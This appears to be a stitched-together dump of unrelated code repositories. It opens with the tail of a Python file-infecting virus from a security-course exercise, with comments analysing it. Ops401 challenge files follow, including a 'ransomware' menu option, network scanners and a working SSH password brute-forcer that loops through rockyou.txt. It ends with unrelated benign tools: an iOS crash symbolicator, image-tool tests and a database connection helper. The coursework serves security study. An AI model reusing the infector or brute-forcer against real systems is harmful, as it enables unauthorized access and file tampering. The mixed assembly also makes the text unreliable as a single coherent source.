# declaring a variable and assigning all of the lines within the file to the variable.
temp = f.read()
# closing the f file from the memory
f.close()
# opening file this time with writing modifier, and override the fname file.
f = open(fname,"w")
# writing the long texts of string thats previously stored from virusstring and concatenate that to the temp variable that has all of the lines from f file.
f.write(virusstring + temp)
# closing the file from the memory
f.close()
# this function to validate current date with may 9th and if its, then print out the fact that user has been hacked.
def detonate():
    # if the current date is May 9th then execute the following code block
if datetime.datetime.now().month == 5 and datetime.datetime.now().day == 9:
# printing to the terminal that you have been hacked.
print "You have been hacked"
# these are where all of the function will be invoked and executed.
## this variable is storing the list that had outputted from locate function call
files_targeted = locate(os.path.abspath(""))
# to call the infect function with output array that is resulted from locate function
infect(files_targeted)
# to invoke detonate, which prints that the user has been hacked if today's date is May 9th.
detonate()
## Stretch Goal
# The functions above are utilizing the os library to do the operation. For locate function, it is using listdir, and isdir in the os library. This is a function in os that outputs boolean if there is such director is available. It also utilize listdir which will print out list of files/folder in the given path. Other functions that was used in that function are array builtin function such adding item to the list or extending the list.
# infected also uses os library as well. First it ulitize path.abspath which give absolute path of given file in the parameter. Another builtin python function it utilizes was open operation. `Open` is used to open the file and using that to read or write the file.
# This is malware that overrides the python file with string of texts. With given text that attacker feeds and original content in the the python file, it overrides the file and put all of them in same categories.
# I think this is a well written code in that it does what attacker intended to do. However, some of the functions fulfills multiple things which can be refactored. A function should do one job and do great at it, where infect and locate function seems to be overloaded with multiple functionality.
``` |
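The stretch-goal notes above point out that `locate` mixes directory recursion with signature checking. A minimal sketch of the same file-selection logic written with `os.walk`, which removes the manual recursion (illustration only, reusing the SIGNATURE marker from the file above):
```python
import os

SIGNATURE = "VIRUS"

def locate_walk(path):
    # Collect .py files that do not yet contain the SIGNATURE marker,
    # letting os.walk handle the directory recursion.
    files_targeted = []
    for root, _dirs, files in os.walk(path):
        for fname in files:
            if not fname.endswith(".py"):
                continue
            full = os.path.join(root, fname)
            with open(full) as handle:
                if not any(SIGNATURE in line for line in handle):
                    files_targeted.append(full)
    return files_targeted
```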
{
"source": "jinwoov/Ops401",
"score": 3
} |
#### File: ops_challenge05/classes/helper_method.py
```python
import time, progressbar, os
def animated_marker():
widgets = ['In Process: ', progressbar.AnimatedMarker()]
bar = progressbar.ProgressBar(widgets=widgets).start()
for i in range(17):
time.sleep(0.1)
bar.update(i)
print ("\033[A \033[A")
print("Finished!")
class colors:
reset='\033[0m'
class fg:
magenta='\033[35m'
green='\033[32m'
red='\033[0;31m'
orange = '\033[33m'
```
#### File: ops_challenge/ops_challenge05/main.py
```python
from classes.key import *
from classes.helper_method import *
from classes.userChoice import *
from classes.malware import *
## interface screen
def interface(key):
print(f"""
______ _ _ _
| ____| | | (_) | |
| |__ _ __ ___ _ __ _ _ _ __ | |_ _ _ __ __ _| |_ ___ _ __
| __| | '_ \ / __| '__| | | | '_ \| __| | '_ \ / _' | __/ _ \| '__|
| |____| | | | (__| | | |_| | |_) | |_| | | | | (_| | || (_) | |
|______|_| |_|\___|_| \__, | .__/ \__|_|_| |_|\__,_|\__\___/|_|
__/ | |
|___/|_|
{colors.fg.orange} by <NAME>{colors.reset}
1) Encrypt File
2) Decrypt File
3) Encrypt a Message
4) Decrypt a Message
5) Encrypt the current folder
6) Decrypt the current folder
{colors.fg.red}7) Initiate RANSOMEWARE{colors.reset}
8) Exit
""")
userChoice = input("Choice ? ")
if(userChoice == "8" or userChoice == None):
print(colors.fg.green, "Thanks for playing", colors.reset)
exit(0)
choiceMenu(userChoice,key)
## Create a main function to execute following functions
def main():
keyring = Key()
interface(keyring.gkey)
# MAIN
if __name__ == "__main__":
while True:
main()
# END
```
#### File: ops-challenge13/classes/arps.py
```python
import scapy.all as s
from .scanner import *
## Class to contain all of the arp properties and methods.
class Arps:
## properties when the object is instantiated
def __init__(self):
self.subnet = self.askWhatGateWay()
self.list_IP = list()
## arpy function that will make ARP scan and get the IP that is responsive
def arpy(self):
arp = s.ARP(pdst=self.subnet)
bcast = "ff:ff:ff:ff:ff:ff"
broadcast = s.Ether(dst=bcast)
request_broadcast = broadcast / arp
clients = s.srp(request_broadcast, timeout =3)[0]
for element in clients:
self.list_IP.append(element[1].psrc)
print(element[1].psrc + " " + element[1].hwsrc)
input("Please enter any key to scan for available IP")
self.checkPorts(self.list_IP)
input("Please enter any key to continue")
## Checking for the ports
def checkPorts(self, ip_adds):
dst_port = [21, 22, 80, 443]
for ip in ip_adds:
testing_vulnerability(str(ip), dst_port)
## Asking user for what subnets
def askWhatGateWay(self):
return input("what subnet do you want to ARP? ")
```
#### File: ops-challenge17/classes/ssh.py
```python
import paramiko
from time import sleep
import os
class AuthSSH():
def __init__(self):
self.IP = self.get_IP()
self.user_name = self.userInfo()
def get_IP(self):
getIP = input("What ip do you want to shell into? ")
while(getIP == "" or getIP == None):
getIP = input("Please put legit IP ")
return getIP
def userInfo(self):
getUN = input("what is the username? ")
while(getUN == "" or getUN == None):
getUN = input("Please put legit username ")
return getUN
def ssh_connection(self):
# client = paramiko.Transport((self.IP, 22))
client = paramiko.SSHClient()
client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
self.crackPW(client)
def crackPW(self,client):
textFile = os.path.abspath("./rockyou.txt")
file = open(textFile, "r")
readfile = file.read().splitlines()
print(self.user_name)
for line in readfile:
print(line)
try:
client.connect(hostname=self.IP, username=self.user_name, password=str(line), port= 22)
print(f"Login was successful to {self.IP} using {str(line)}, you are now in")
break
except:
print("Login failed :(")
sleep(.5)
continue
stdin, stdout, stderr = client.exec_command("ping -c 3 8.8.8.8")
print(stdout.read().splitlines())
client.close()
return
```
#### File: ops-challenge26/classess/loggin.py
```python
import logging,os
class OneLineExceptionFormatter(logging.Formatter):
def formatException(self, exc_info):
return super().formatException(exc_info)
def format(self, record):
result = super().format(record)
if record.exc_text:
result = result.replace("\n", "")
return result
root = logging.getLogger()
logging.basicConfig(filename="./error.log", level=logging.DEBUG, format='%(asctime)s:%(levelname)s:%(message)s')
logging.debug("Debug Information")
logging.info("Info information")
logging.warning("Warning information")
logging.error("Error information")
logging.critical("Critical information")
# formatter = OneLineExceptionFormatter(logging.BASIC_FORMAT)
# fh = logging.FileHandler("./error.log")
# fh.setLevel(os.environ.get("LOGLEVEL", "INFO"))
# fh.setFormatter(formatter)
# root.addHandler(fh)
```
#### File: ops_challenge/ops-challenge45/main.py
```python
from classes.port_scanner import *
from classes.banner_grab import *
from classes.nmap_scan import *
def interface():
print("""
1) Banner Grabber
2) Port Scanner
3) NMAP Scanner
4) Exit
""")
user_input = input("Choice?..... ")
try:
dictionary[user_input]()
except Exception as msg:
print(colors.fg.red, msg, colors.reset)
pass
dictionary = {
"1": main_banner,
"2": main_port,
"3": nmap_interface,
"4": exit
}
while True:
interface()
```
#### File: ops-challenges27/classes/rotating_log.py
```python
import logging
import time
from logging.handlers import RotatingFileHandler
from logging.handlers import TimedRotatingFileHandler
## rotating logs
def rotating_log(filePath, size):
logger = logging.getLogger("Rotaing log")
logger.setLevel(logging.INFO)
handler = RotatingFileHandler(filePath, maxBytes=int(size), backupCount=5)
userBlah = input("what message do you want?")
logger.addHandler(handler)
for i in range(20):
logger.info(f"{userBlah} %s" % i)
time.sleep(1.5)
```
#### File: ops-challenges27/classes/rotating_time.py
```python
import logging
import time
from logging.handlers import TimedRotatingFileHandler
## this is to track the time
def rotating_time(filePath):
logger = logging.getLogger("Rotating log")
logger.setLevel(logging.INFO)
timer = user_choice()
# this is going to track it when the minute is over while logging. due to when="w"
handler = TimedRotatingFileHandler(filePath,
when =timer,
interval=1,
backupCount=5)
logger.addHandler(handler)
for i in range(6):
logger.info("this is test log line")
time.sleep(60)
def user_choice():
print("""
How often do you want to change log files?
1. Seconds
2. Minutes
3. Hours
4. Days
""")
userT = input()
if(userT == "1"):
return "s"
elif(userT == "2"):
return "m"
elif(userT == "3"):
return "h"
else:
return "d"
```
#### File: ops_challenge/ops-challenges31/main.py
```python
import sys
from classes.search import *
## Declare functions
def interface():
# operSys = sys.platform
# if operSys.lower().__contains__("win"):
# search_windows()
# # else:
# # search_linux()
search_file()
exit(0)
## Main
def main():
interface()
if __name__ == "__main__":
main()
## END
```
#### File: ops-challenges33/classes/search.py
```python
import subprocess, os
from time import sleep
from .colors import *
# Declare variables
# querying the functions to check if the file exists.
def search_file():
try:
# prompting user with different option
user_file = input("What file name do you want to search? ")
dir_location = input("What directory do you want to search in? ")
path_way = os.path.abspath(dir_location)
# Printing out to check with the user if they are satisfied with their answer
print(colors.fg.green, path_way , f"File Name: {user_file}", colors.reset)
user_choice = input("Is this where and what you want to search? (y/n) ")
# while loop to check if the answer was y if not it will run continuous loop to get yes as a output.
while (user_choice != "y"):
dir_location = input("What directory do you want to search in? ")
path_way = os.path.abspath(dir_location)
print(colors.fg.green, path_way , f"File Name: {user_file}", colors.reset)
user_choice = input("Is this where and what you want to search? (y/n) ")
counter = output_search(user_file, path_way)
if(counter == 0):
print(colors.fg.red, "No result found", colors.reset)
else:
print(colors.fg.green, f"{counter} out of {total_files} files were matched", colors.reset)
input("Search complete")
except Exception as msg:
print(msg)
exit(1)
# universal file finder
def output_search(sf, pt):
count = 0
global total_files
total_files = 0
for root, dirs, files in os.walk(pt):
for file in files:
if(file.lower().__contains__(sf)):
print(os.path.join(root, file))
sleep(1.5)
count += 1
total_files += 1
return count
```
#### File: ops_challenge/ops-challenges37/main.py
```python
from classes.banner_grab import *
from classes.cookies import *
from time import sleep
## Declare Function
def interface():
try:
bringforthcookiemonster()
print("""
1) Banner Grabbing
2) Cookie Capture
3) XSS Vulnerability Detection
4) Exit
""")
user_answer = input("Whats your choice... ")
if (user_answer == "1"):
banner_grabbing()
elif (user_answer == "2"):
get_html()
elif (user_answer == "3"):
xss_detection()
else:
print("exiting.... ")
sleep(1.5)
exit(0)
except Exception as msg:
print(msg)
exit(1)
## Main
if __name__ == "__main__":
interface()
## End
``` |
{
"source": "JinWuZhao/symbolicatedcrash",
"score": 2
} |
#### File: symbolicatedcrash/symbolicate/symbolicate.py
```python
from logutils import *
import re
from subprocess import getstatusoutput
import os
__author__ = 'jinzhao'
def version():
return '1.0.0'
def symbolicate_crash(crash_log, finder_func, output_path=None, verbose_mode=False):
"""
    Symbolicate a crash log.
    :param crash_log: path to the crash log file
    :param finder_func: handler that looks up the app's symbol file, defined as: (name:string, identifier:string, version:string, codetype:string, uuid:string) -> (path)
    :param output_path: path of the symbolicated crash file; defaults to None, which means the result is printed to stdout
    :param verbose_mode: whether to enable verbose (debug) mode
    :return: whether symbolication succeeded
"""
if verbose_mode is False:
global loge
global logd
global logi
loge = lambda x : x
logd = lambda x : x
logi = lambda x : x
status, lines = _read_log(crash_log)
if status is False:
loge('cannot open log file "{log_file}"'.format(log_file=crash_log))
return False
crash_list = _parse_content(lines, finder_func)
logd('there is %d crash obj' % len(crash_list))
crash_list = map(lambda obj: _symbolicate_stack_items(obj), crash_list)
newlines = _compose_log(crash_list, lines)
if output_path is None:
for line in newlines:
print(line.rstrip('\n'))
else:
if _write_log(output_path, newlines) is False:
loge('cannot write into file "{log_file}"'.format(log_file=output_path))
return False
return True
def query_uuid(code_type, symbol_file):
"""
    Query the UUID of a symbol file.
    :param code_type: CPU architecture
    :param symbol_file: path to the symbol file
    :return: uuid
"""
uuid_re_obj = re.compile(_match_dwarfdump_uuid_re())
logd('dwarfdump --uuid --arch {code_type} {symbol_file}'.format(code_type=code_type, symbol_file=symbol_file))
status, output = getstatusoutput('dwarfdump --uuid --arch {code_type} {symbol_file}'.format(code_type=code_type, symbol_file=symbol_file))
output_uuid = ''
uuid_match_obj = uuid_re_obj.match(output)
if uuid_match_obj is not None:
output_uuid = ''.join(uuid_match_obj.groups())
else:
loge('cannot parse the output of dwarfdump')
return output_uuid
def _match_crash_header_re():
"""
Match the 'Incident Identifier: xxxxxx-xxxx-xxxx-xxxx-xxxxxx' header line
"""
return r'^Incident\sIdentifier:\s*[A-F0-9\-]+\s*$'
def _match_product_name_re():
"""
Match the application process name
"""
return r'^Process:\s*([\S.]+)\s\[\d+\]\s*$'
def _match_identifier_re():
"""
Match the bundle identifier (BundleId)
"""
return r'^Identifier:\s*([a-zA-Z0-9_\-\.]+)\s*$'
def _match_version_re():
"""
Match the application version number
"""
return r'^Version:\s*([\d\.]+)\s*$'
def _match_code_type_re():
"""
Match the code type
"""
return r'^Code\sType:\s*([a-zA-Z0-9\-]+)\s*$'
def _match_os_version_re():
"""
Match the OS version
"""
return r'^OS\sVersion:\s*i[^0-9]+(.+)\s*$'
def _match_stack_item_re():
"""
Match a crash stack frame line
"""
return r'^\d+\s+([a-zA-Z0-9\-_\+\.]+)\s+(0x[a-f0-9]+)\s(0x[a-f0-9]+)\s\+\s\d+\s*$'
def _sub_stack_item_symbol_re():
"""
Match the portion after load_address in a stack frame, which will be replaced with the symbolicated name
"""
return r'0x[a-f0-9]+\s\+\s[\d]+'
def _match_image_item_re():
"""
Match a binary image line
"""
return r'^\s*(0x[a-f0-9]+)\s\-\s+0x[a-f0-9]+\s+([a-zA-Z0-9\-_\+\.]+)\s+([a-z0-9]+)\s+(<([a-f0-9]+)>\s)?([\S.]+)\s*$'
def _match_stack_header_re():
"""
Match the crash stack section header
"""
return r'^Last\sException\sBacktrace:\s*$|^Thread\s0\sCrashed:\s*$|^Thread\s0:\s*$'
def _match_image_header_re():
"""
Match the binary images section header
"""
return r'^Binary\sImages:\s*$'
def _sub_proccess_file_path_re():
"""
Match whitespace and parentheses in file paths that the shell cannot handle, so they can be escaped
"""
return r'([\\]?[\s\(\)])'
def _match_dwarfdump_uuid_re():
"""
Match the UUID portion of dwarfdump output
"""
return r'^UUID:\s([A-F0-9]+)\-([A-F0-9]+)\-([A-F0-9]+)\-([A-F0-9]+)\-([A-F0-9]+)\s\([a-z0-9]+\)\s.+$'
def _os_symbol_file_path_prefix():
"""
Path prefix for iOS system symbol files
"""
return '~/Library/Developer/Xcode/iOS DeviceSupport'
class CrashInfo(object):
"""
Crash data structure
"""
def __init__(self):
self.__product_name = None
self.__identifier = None
self.__version = None
self.__code_type = None
self.__os_version = None
self.__function_stacks = None
self.__binary_images = None
@property
def product_name(self):
if self.__product_name is None:
self.__product_name = ''
return self.__product_name
@product_name.setter
def product_name(self, value):
self.__product_name = value
@property
def identifier(self):
if self.__identifier is None:
self.__identifier = ''
return self.__identifier
@identifier.setter
def identifier(self, value):
self.__identifier = value
@property
def version(self):
if self.__version is None:
self.__version = ''
return self.__version
@version.setter
def version(self, value):
self.__version = value
@property
def code_type(self):
if self.__code_type is None:
self.__code_type = ''
return self.__code_type
@code_type.setter
def code_type(self, value):
self.__code_type = value
@property
def os_version(self):
if self.__os_version is None:
self.__os_version = ''
return self.__os_version
@os_version.setter
def os_version(self, value):
self.__os_version = value
@property
def function_stacks(self):
if self.__function_stacks is None:
self.__function_stacks = list()
return self.__function_stacks
@property
def binary_images(self):
if self.__binary_images is None:
self.__binary_images = dict()
return self.__binary_images
class StackItemInfo(object):
"""
Stack frame data structure
"""
def __init__(self):
self.__line_num = None
self.__name = None
self.__invoke_address = None
self.__load_address = None
self.__invoke_symbol = None
@property
def line_num(self):
if self.__line_num is None:
self.__line_num = -1
return self.__line_num
@line_num.setter
def line_num(self, value):
self.__line_num = value
@property
def name(self):
if self.__name is None:
self.__name = ''
return self.__name
@name.setter
def name(self, value):
self.__name = value
@property
def invoke_address(self):
if self.__invoke_address is None:
self.__invoke_address = ''
return self.__invoke_address
@invoke_address.setter
def invoke_address(self, value):
self.__invoke_address = value
@property
def load_address(self):
if self.__load_address is None:
self.__load_address = ''
return self.__load_address
@load_address.setter
def load_address(self, value):
self.__load_address = value
@property
def invoke_symbol(self):
if self.__invoke_symbol is None:
self.__invoke_symbol = ''
return self.__invoke_symbol
@invoke_symbol.setter
def invoke_symbol(self, value):
self.__invoke_symbol = value
class ImageItemInfo(object):
"""
Binary image data structure
"""
def __init__(self):
self.__load_address = None
self.__name = None
self.__code_type = None
self.__uuid = None
self.__symbol_file = None
@property
def load_address(self):
if self.__load_address is None:
self.__load_address = ''
return self.__load_address
@load_address.setter
def load_address(self, value):
self.__load_address = value
@property
def name(self):
if self.__name is None:
self.__name = ''
return self.__name
@name.setter
def name(self, value):
self.__name = value
@property
def code_type(self):
if self.__code_type is None:
self.__code_type = ''
return self.__code_type
@code_type.setter
def code_type(self, value):
self.__code_type = value
@property
def uuid(self):
if self.__uuid is None:
self.__uuid = ''
return self.__uuid
@uuid.setter
def uuid(self, value):
self.__uuid = value
@property
def symbol_file(self):
if self.__symbol_file is None:
self.__symbol_file = ''
return self.__symbol_file
@symbol_file.setter
def symbol_file(self, value):
self.__symbol_file = value
def _read_log(path):
"""
:param path: log file path
:return status:Bool, lines:List
"""
lines = list()
try:
with open(path, 'r') as file:
logi('open file {log_path} for reading'.format(log_path=path))
lines = file.readlines()
except Exception as e:
loge(e)
return (False, list())
return (True, lines)
def _write_log(path, lines):
"""
:param path: log file path
:param lines: content
:return status:Bool
"""
try:
with open(path, 'w') as file:
logi('open file {log_path} for writing'.format(log_path=path))
file.writelines(lines)
except Exception as e:
loge(e)
return False
return True
def _parse_content(lines, finder_func):
"""
:param lines: content
:param finder_func: (name:String, identifier:String, version:String, codetype:String, uuid:String) -> (path)
:return crash_list: list of CrashInfo
"""
header_part_complete = False
stack_info_complete = False
image_info_complete = False
crash_list = list()
re_obj = None
crash_obj = None
for index, line in enumerate(lines):
#logd('line %d: %s' % (index, line))
if header_part_complete is False:
crash_obj, header_part_complete = _parse_crash_info(line, crash_obj)
#logd('parse crash info complete: ' + str(header_part_complete))
elif stack_info_complete is False:
crash_obj, re_obj, stack_info_complete = _parse_stack_info(line, re_obj, crash_obj, index)
#logd('parse stack info complete: ' + str(stack_info_complete))
elif image_info_complete is False:
crash_obj, re_obj, image_info_complete = _parse_image_info(line, re_obj, crash_obj)
#logd('parse image info complete: ' + str(image_info_complete))
else:
crash_obj.binary_images[crash_obj.product_name].symbol_file = finder_func(crash_obj.product_name, crash_obj.identifier, crash_obj.version, crash_obj.binary_images[crash_obj.product_name].code_type, crash_obj.binary_images[crash_obj.product_name].uuid)
crash_list.append(crash_obj)
#logd('store crash obj')
header_part_complete = False
stack_info_complete = False
image_info_complete = False
crash_obj = None
return crash_list
def _parse_crash_info(line, crash_obj):
"""
:param line: line string
:param crash_obj: CrashInfo object
:return: crash_obj, complete:Bool
"""
complete = False
if crash_obj is None:
if re.match(_match_crash_header_re(), line) is not None:
crash_obj = CrashInfo()
elif len(crash_obj.product_name) == 0 :
match_obj = re.match(_match_product_name_re(), line)
if match_obj is not None:
crash_obj.product_name = match_obj.group(1)
elif len(crash_obj.identifier) == 0:
match_obj = re.match(_match_identifier_re(), line)
if match_obj is not None:
crash_obj.identifier = match_obj.group(1)
elif len(crash_obj.version) == 0:
match_obj = re.match(_match_version_re(), line)
if match_obj is not None:
crash_obj.version = match_obj.group(1)
elif len(crash_obj.code_type) == 0:
match_obj = re.match(_match_code_type_re(), line)
if match_obj is not None:
crash_obj.code_type = match_obj.group(1)
elif len(crash_obj.os_version) == 0:
match_obj = re.match(_match_os_version_re(), line)
if match_obj is not None:
crash_obj.os_version = match_obj.group(1)
complete = True
return (crash_obj, complete)
def _parse_stack_info(line, re_obj, crash_obj, line_num):
"""
:param line: line string
:param re_obj: re compiled object
:param crash_obj: CrashInfo object
:return: crash_obj, re_obj, complete:Bool
"""
if re_obj is None:
re_obj = re.compile(_match_stack_item_re())
complete = False
match_obj = re_obj.match(line)
if match_obj is not None:
stack_item = StackItemInfo()
stack_item.name = match_obj.group(1)
stack_item.invoke_address = match_obj.group(2)
stack_item.load_address = match_obj.group(3)
stack_item.line_num = line_num
crash_obj.function_stacks.append(stack_item)
elif re.match(_match_image_header_re(), line) is not None:
complete = True
re_obj = None
return (crash_obj, re_obj, complete)
def _parse_image_info(line, re_obj, crash_obj):
"""
:param line: line string
:param re_obj: re compiled object
:param crash_obj: CrashInfo object
:return: crash_obj, re_obj, complete:Bool
"""
if re_obj is None:
re_obj = re.compile(_match_image_item_re())
complete = False
match_obj = re_obj.match(line)
if match_obj is not None:
image_item = ImageItemInfo()
image_item.load_address = match_obj.group(1)
image_item.name = match_obj.group(2).lstrip('+')
image_item.code_type = match_obj.group(3)
image_item.uuid = match_obj.group(5)
if image_item.uuid is not None:
image_item.uuid = image_item.uuid.upper()
image_item.symbol_file = '{prefix}/{os_version}/Symbols/{symbol_file}'\
''.format(prefix=_os_symbol_file_path_prefix(),
os_version=crash_obj.os_version,
symbol_file=match_obj.group(6).lstrip('/'))
crash_obj.binary_images[image_item.name] = image_item
elif len(crash_obj.binary_images.items()) > 0:
complete = True
re_obj = None
return (crash_obj, re_obj, complete)
def _symbolicate_stack_items(crash_obj):
"""
:param crash_obj: CrashInfo object
:return: crash_obj
"""
re_obj = re.compile(_sub_proccess_file_path_re())
uuid_re_obj = re.compile(_match_dwarfdump_uuid_re())
def proccess_path(match_obj):
matched_str = match_obj.group(1)
if len(matched_str) > 0 and matched_str[0] != '\\':
return '\\'+matched_str
return matched_str
def run_atos(stack_item, image_item, symbol_file_path):
logd('atos -arch {code_type} -o {symbol_file} -l {load_address} {invoke_address}'.format(code_type=image_item.code_type, symbol_file=symbol_file_path, load_address=stack_item.load_address, invoke_address=stack_item.invoke_address))
status, output = getstatusoutput('atos -arch {code_type} -o {symbol_file} -l {load_address} {invoke_address}'.format(code_type=image_item.code_type, symbol_file=symbol_file_path, load_address=stack_item.load_address, invoke_address=stack_item.invoke_address))
if status == 0:
stack_item.invoke_symbol = output
else:
loge(output)
for stack_item in crash_obj.function_stacks:
image_item = crash_obj.binary_images.get(stack_item.name)
if image_item is None:
continue
symbol_file_path = re_obj.sub(proccess_path, image_item.symbol_file)
if image_item.uuid is not None and len(image_item.uuid) > 0:
logd('dwarfdump --uuid --arch {code_type} {symbol_file}'.format(code_type=image_item.code_type, symbol_file=symbol_file_path))
status, output = getstatusoutput('dwarfdump --uuid --arch {code_type} {symbol_file}'.format(code_type=image_item.code_type, symbol_file=symbol_file_path))
output_uuid = output
uuid_match_obj = uuid_re_obj.match(output)
if uuid_match_obj is not None:
output_uuid = ''.join(uuid_match_obj.groups())
else:
loge('cannot parse the output of dwarfdump')
if status == 0 and output_uuid == image_item.uuid:
run_atos(stack_item, image_item, symbol_file_path)
else:
loge('warning! symbol file "{symbol_file}": UUID does not match {uuid}'.format(symbol_file=symbol_file_path, uuid=image_item.uuid))
loge(output)
else:
run_atos(stack_item, image_item, symbol_file_path)
return crash_obj
def _compose_log(crash_list, lines):
"""
:param crash_list: CrashInfo list
:param lines: origin log content
:return: new log content
"""
re_obj = re.compile(_sub_stack_item_symbol_re())
for crash_obj in crash_list:
for stack_item in crash_obj.function_stacks:
lines[stack_item.line_num] = re_obj.sub(stack_item.invoke_symbol, lines[stack_item.line_num])
return lines
``` |
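A minimal usage sketch of the symbolication API above. The import path and the `find_app_dsym` lookup helper are assumptions for illustration; the `symbolicate_crash(crash_log, finder_func, output_path, verbose_mode)` signature and the finder callback arguments come directly from the code.
```python
from symbolicate import symbolicate_crash  # assumption: symbolicate.py is on the import path

def find_app_dsym(name, identifier, version, code_type, uuid):
    # Hypothetical lookup: map the app name / bundle id / version / arch / UUID reported in the
    # crash log to a local dSYM binary, e.g. from an archive directory you maintain yourself.
    return '/path/to/dSYMs/{0}.app.dSYM/Contents/Resources/DWARF/{0}'.format(name)

# Writes a symbolicated copy of the crash log; pass output_path=None to print to stdout instead.
symbolicate_crash('MyApp.crash', find_app_dsym, output_path='MyApp.symbolicated.crash', verbose_mode=True)
```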
{
"source": "jinwyp/image-background-remove-tool",
"score": 2
} |
#### File: image-background-remove-tool/tests/test_gen.py
```python
import unittest
from libs import strings
from main import process
import multiprocessing
import os
def run(test, i, o, m, prep, postp):
try:
process(i, o, m, prep, postp)
except BaseException as e:
test.fail("TESTING FAILED!\n"
"PARAMS:\n"
"model_name: {}\n"
"input_path: {}\n"
"output_path: {}\n"
"preprocessing_method: {}\n"
"postprocessing_method: {}\n"
"Error: {}\n".format(m, i, o, prep, postp, str(e)))
exit(1)
exit(0)
def gen(test):
for model_name in strings.MODELS_NAMES:
for preprocess_method_name in strings.PREPROCESS_METHODS:
for postprocess_method_name in strings.POSTPROCESS_METHODS:
if not os.path.exists("docs/imgs/examples/{}/{}/{}".format(model_name,
preprocess_method_name,
postprocess_method_name)):
os.makedirs("docs/imgs/examples/{}/{}/{}".format(model_name,
preprocess_method_name, postprocess_method_name),
exist_ok=True)
print(model_name, preprocess_method_name, postprocess_method_name)
proc = multiprocessing.Process(target=run,
args=(test, "docs/imgs/input/",
"docs/imgs/examples/{}/{}/{}".format(model_name,
preprocess_method_name,
postprocess_method_name),
model_name, preprocess_method_name, postprocess_method_name,))
proc.start()
proc.join()
if proc.exitcode == 1:
return False
return True
class GenTest(unittest.TestCase):
def test_generator(self):
self.assertEqual(gen(self), True)
if __name__ == '__main__':
unittest.main()
```
#### File: image-background-remove-tool/tests/test_save.py
```python
from main import __save_image_file__
import os
import shutil
import unittest
import random
from PIL import Image
def new_name():
filename = str(random.randint(0, 1202)) + ".jpg"
return filename
def save():
path = "tests/tests_temp/save_test/"
if not os.path.exists(path):
os.makedirs(path, exist_ok=True)
__save_image_file__(Image.new("RGBA", (256, 256), color=0), new_name(), path, "dir") # Dir mode
__save_image_file__(Image.new("RGBA", (256, 256), color=0), new_name(), path, "file") # File name empty base name
a = None
f = new_name()
try:
__save_image_file__(Image.new("RGBA", (256, 256), color=0), f, path + f, "file") # Extension Exception
except OSError:
a = True
if a:
a = False
try:
__save_image_file__(Image.new("RGBA", (256, 256), color=0), f, path + f, "dir") # Not dir error
except OSError as e:
a = True
if a:
__save_image_file__(Image.new("RGBA", (256, 256), color=0), f, path + f + '.png',
"file") # filename png test
else:
return False
else:
return False
shutil.rmtree(path)
return True
class SaveTest(unittest.TestCase):
def test_save(self):
self.assertEqual(save(), True)
if __name__ == '__main__':
unittest.main()
``` |
{
"source": "jinwzhang/running-procedure",
"score": 2
} |
#### File: running-procedure/PyProcedure/DB_Buddy.py
```python
import cx_Oracle
import pyodbc
import pymysql
import pandas as pd
import re
import sys
if sys.platform == 'linux':
from pyhive import hive
'''
<<<DB_Buddy v1.2>>>
Features:
v1.0 20200402 Base integration class for connecting Python to the data warehouse; a single class provides direct connections to ORACLE, MYSQL and SQLSERVER.
v1.1 20200813 Added recording of SQL%ROWCOUNT.
v1.2 20200824 Added support for connecting to Hive.
Query results can be converted to a pandas.DataFrame, and a built-in context manager makes with-statement usage convenient.
Author: zhangjinwei
path: /etl_home/app/ETL_HOME/ETL_SERVER/BIN/script/python_app
'''
def find_row_affect(logs: list):
"""正则函数, 目的是从大量的日志中找到 写入的行数信息"""
pattern = re.compile(r'(HDFS Write: )(\d*)')
search_record = [pattern.search(str(log)) for log in logs]
for searched in search_record:
if searched:
return searched.group(2)
return 0
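# Worked example (hypothetical Hive log line):
# find_row_affect(['... HDFS Read: 1024 HDFS Write: 350 SUCCESS ...']) returns '350';
# when no line matches, the function returns 0 instead.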
class DatabaseBuddy(object):
# Constructor arguments: 1) database type 2) username 3) password 4) database IP 5) port
def __init__(self, DB_type, db_username, db_pwd, db_IP, db_port, **kwargs):
self.DB_type = str(DB_type).upper()
self._support_db = ['ORACLE', 'MYSQL', 'MSSQL', 'SQLSERVER', 'HIVE']
assert self.DB_type in self._support_db, 'Unsupported database type; currently supported: %s' % str(self._support_db)
self.db_username = db_username
self._db_pwd = db_pwd
self.db_IP = db_IP
self.db_port = db_port
self.other = kwargs
self.parallel = kwargs.get('option', False)
def __enter__(self):
if self.DB_type == 'ORACLE':
connection = cx_Oracle.connect(self.db_username, self._db_pwd, self.db_IP + ':' + self.db_port,
encoding="UTF-8")
elif self.DB_type == 'MYSQL':
connection = pymysql.connect(user=self.db_username, password=self._db_pwd, host=self.db_IP,
port=int(self.db_port), charset="utf8")
elif self.DB_type == 'MSSQL':
connection = pyodbc.connect('DRIVER={ODBC Driver 17 for SQL Server};server=%s;UID=%s;PWD=%s' % (
self.db_IP + ',' + self.db_port, self.db_username, self._db_pwd))
connection.add_output_converter(-150, self.handle_sql_variant_as_string)  # some MSSQL return types must be converted before they can be fetched
elif self.DB_type == 'HIVE':
connection = hive.Connection(host=self.db_IP, port=self.db_port, username=self.db_username)
self.connections = connection
cursor = connection.cursor()
self.curr = cursor
if self.DB_type == 'ORACLE' and int(self.parallel) in range(1, 20):
self.excute_one('alter session enable parallel DML')
self.excute_one('alter session force parallel query parallel %d' % self.parallel)
self.excute_one('alter session force parallel dml parallel %d' % self.parallel)
print('set oracle session with parallel %d' % self.parallel)
return self
def __repr__(self):
return "<%s %s %s>" % (self.db_IP, self.db_port, self.db_username)
def __exit__(self, exc_ty, exc_val, tb):
self.connections.close()
def handle_sql_variant_as_string(self, value):
return value.decode('utf-16le')
def fetch(self, limit=50000, printf=True) -> tuple:
data = self.curr.fetchmany(limit)
if printf:
print(data)
return data
def excute_one(self, sql, commit=False, printf=False):
"""执行单条sql"""
row_affect = self.curr.execute(sql)  # pymysql returns the affected row count directly from execute()
if printf:
self.fetch()
if commit:
self.curr.execute('commit')
if self.DB_type == 'ORACLE':
row_affect = self.curr.rowcount
elif self.DB_type == 'HIVE':
log = self.fetch_logs()
row_affect = find_row_affect(log)
return row_affect
def excute_one_asyn(self):
"""异步执行"""
pass
def columns(self) -> list:
"""返回sql结果的表头"""
return [i[0] for i in self.curr.description]
def run_procedual(self, proc_name: str, *arg):
"""运行存储过程,存储过程名,[存储过程参数]"""
result_code = self.curr.var(int)
self.curr.callproc(proc_name, arg)
return result_code.getvalue()
def to_dataframe(self, *, row_num=0, header=True):
"""将SQL执行的结果放入到DataFrame当中并返回"""
